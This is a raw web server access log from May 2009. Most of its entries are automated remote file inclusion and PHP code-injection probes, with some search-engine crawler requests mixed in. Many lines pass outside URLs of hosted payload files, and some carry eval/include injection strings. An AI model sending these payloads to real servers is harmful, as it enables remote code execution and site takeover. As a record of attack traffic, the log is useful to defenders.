220.79.47.122 - - [28/May/2009:07:33:29 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
220.79.47.122 - - [28/May/2009:07:33:29 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
195.56.55.217 - - [28/May/2009:07:33:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://208.98.22.241/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
195.56.55.217 - - [28/May/2009:07:33:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
85.17.162.28 - - [28/May/2009:07:34:31 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:34:31 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:37:56 -0500] "GET /errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:37:56 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:37:57 -0500] "GET /logs/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:38:04 -0500] "GET /errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:38:04 -0500] "GET /logs/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:38:05 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:38:46 -0500] "GET /logs/access_log.1230336000/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:38:55 -0500] "GET /logs/access_log.1230336000/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
193.231.42.152 - - [28/May/2009:07:39:17 -0500] "GET /logs/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:07:39:17 -0500] "GET /?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:07:39:29 -0500] "GET /logs/?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:07:39:32 -0500] "GET /?sourcedir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:07:40:15 -0500] "GET /logs/?sourcedir=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:07:40:15 -0500] "GET /?sourcedir=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
113.29.225.7 - - [28/May/2009:07:42:33 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:42:33 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:42:33 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:44:03 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:44:03 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:44:03 -0500] "GET //guestbook1//admin.php?include_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:46:43 -0500] "GET //guestbook1//admin.php?include_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:46:43 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:07:46:43 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.7.201.86 - - [28/May/2009:07:46:59 -0500] "GET /logs//mail_this_entry/mail_autocheck.php?pm_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.826"
66.7.201.86 - - [28/May/2009:07:46:59 -0500] "GET //mail_this_entry/mail_autocheck.php?pm_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.826"
87.230.23.105 - - [28/May/2009:07:47:12 -0500] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.230.23.105 - - [28/May/2009:07:47:12 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.230.23.105 - - [28/May/2009:07:47:14 -0500] "GET /logs/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:15 -0500] "GET //shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:15 -0500] "GET /logs/access_log.1239667200//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:15 -0500] "GET /logs/access_log.1242518400//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:15 -0500] "GET /logs//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.230.23.105 - - [28/May/2009:07:47:22 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:30 -0500] "GET //shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:30 -0500] "GET /logs//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:30 -0500] "GET /logs/access_log.1239667200//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:47:30 -0500] "GET /logs/access_log.1242518400//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
212.117.188.207 - - [28/May/2009:07:47:38 -0500] "GET /logs/access_log.1241395200 HTTP/1.1" 200 229376 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.127.188.139 - - [28/May/2009:07:47:55 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:47:55 -0500] "GET //guestbook1//admin.php?include_path=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:47:55 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:47:55 -0500] "GET //guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:47:55 -0500] "GET /logs//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:47:55 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:47:59 -0500] "GET /logs//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:47:59 -0500] "GET //guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:47:59 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:48:01 -0500] "GET /logs/access_log.1238112000//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:01 -0500] "GET //guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:01 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:01 -0500] "GET /logs//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:07:48:04 -0500] "GET /logs/access_log.1238112000//shoutbox/expanded.php?conf=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:11 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:11 -0500] "GET //guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:12 -0500] "GET /logs//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:48:22 -0500] "GET /logs/access_log.1239753600//guestbook1//admin.php?include_path=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:30 -0500] "GET /logs/access_log.1239753600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:31 -0500] "GET /logs/access_log.1239753600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:07:48:45 -0500] "GET /logs/access_log.1239753600//guestbook1//admin.php?include_path=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:49:21 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:49:21 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:49:21 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
94.127.188.139 - - [28/May/2009:07:49:44 -0500] "GET /logs/access_log.1238630400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snoeken.net//poll/polldata/fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:53:38 -0500] "GET //include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:53:38 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:53:39 -0500] "GET /logs/access_log.1241049600//include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:54:57 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:54:57 -0500] "GET //include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:54:57 -0500] "GET /logs/access_log.1241049600//include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.249.65.36 - - [28/May/2009:07:58:37 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 200 1522 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.119.103.12 - - [28/May/2009:08:02:05 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:08:02:05 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:08:02:05 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.119.154.129 - - [28/May/2009:08:02:20 -0500] "GET /logs//phplive/help.php?css_path=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.119.154.129 - - [28/May/2009:08:02:20 -0500] "GET //phplive/help.php?css_path=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
85.119.154.129 - - [28/May/2009:08:02:47 -0500] "GET /logs//phplive/help.php?css_path=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.119.154.129 - - [28/May/2009:08:02:50 -0500] "GET //phplive/help.php?css_path=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.119.103.12 - - [28/May/2009:08:02:56 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:06:11 -0500] "GET /e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:06:11 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:06:11 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.94.155.59 - - [28/May/2009:08:06:11 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:08:08:16 -0500] "GET /logs/access_log.1235692800//include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:08:08:46 -0500] "GET /logs/access_log.1235692800//include/mail.inc.php?skin_board_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
208.80.195.38 - - [28/May/2009:08:11:31 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IE5.x/Winxx/EZN/xx; .NET CLR 1.1.4322)"
216.119.103.12 - - [28/May/2009:08:12:41 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:08:12:41 -0500] "GET /logs/access_log.1240358400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:08:12:41 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:08:12:41 -0500] "GET /logs/access_log.1242000000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
86.109.108.66 - - [28/May/2009:08:16:37 -0500] "GET /logs/access_log.1242172800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.parketto.it/nuovo/page1/01bot/b1tchXs4f3.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
86.109.108.66 - - [28/May/2009:08:16:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.parketto.it/nuovo/page1/01bot/b1tchXs4f3.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
86.109.108.66 - - [28/May/2009:08:16:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.parketto.it/nuovo/page1/01bot/b1tchXs4f3.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.55.106.143 - - [28/May/2009:08:17:38 -0500] "GET /silver_spanish_piece_of_eight.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.173.130.41 - - [28/May/2009:08:19:07 -0500] "GET /e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.173.130.41 - - [28/May/2009:08:19:07 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.173.130.41 - - [28/May/2009:08:19:08 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.173.130.41 - - [28/May/2009:08:19:08 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.106.239 - - [28/May/2009:08:21:39 -0500] "GET /logs/access_log.1161216000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.15.28.165 - - [28/May/2009:08:23:32 -0500] "GET /logs//?include=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.805"
173.15.28.165 - - [28/May/2009:08:23:32 -0500] "GET //?include=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
91.121.18.203 - - [28/May/2009:08:23:57 -0500] "GET /logs//?include=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 36689 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:08:23:58 -0500] "GET //?include=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
80.237.146.58 - - [28/May/2009:08:24:24 -0500] "GET /logs//?include=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:08:24:24 -0500] "GET //?include=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.76"
86.109.108.66 - - [28/May/2009:08:26:48 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.parketto.it/nuovo/page1/01bot/b1tchXs4f3.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
86.109.108.66 - - [28/May/2009:08:26:49 -0500] "GET /logs/access_log.1241913600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.parketto.it/nuovo/page1/01bot/b1tchXs4f3.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
62.26.219.92 - - [28/May/2009:08:30:17 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:08:30:17 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:08:30:17 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:08:30:17 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.249.65.36 - - [28/May/2009:08:30:49 -0500] "GET /Kramden%20Norton.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
62.26.219.92 - - [28/May/2009:08:31:31 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:08:31:31 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:08:31:31 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.26.219.92 - - [28/May/2009:08:31:31 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
65.55.106.232 - - [28/May/2009:08:31:38 -0500] "GET /logs/access_log.1206489600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
113.29.225.7 - - [28/May/2009:08:32:49 -0500] "GET //?include=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
113.29.225.7 - - [28/May/2009:08:32:52 -0500] "GET /logs//?include=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 200 191100 "-""libwww-perl/5.805"
58.227.193.198 - - [28/May/2009:08:32:54 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
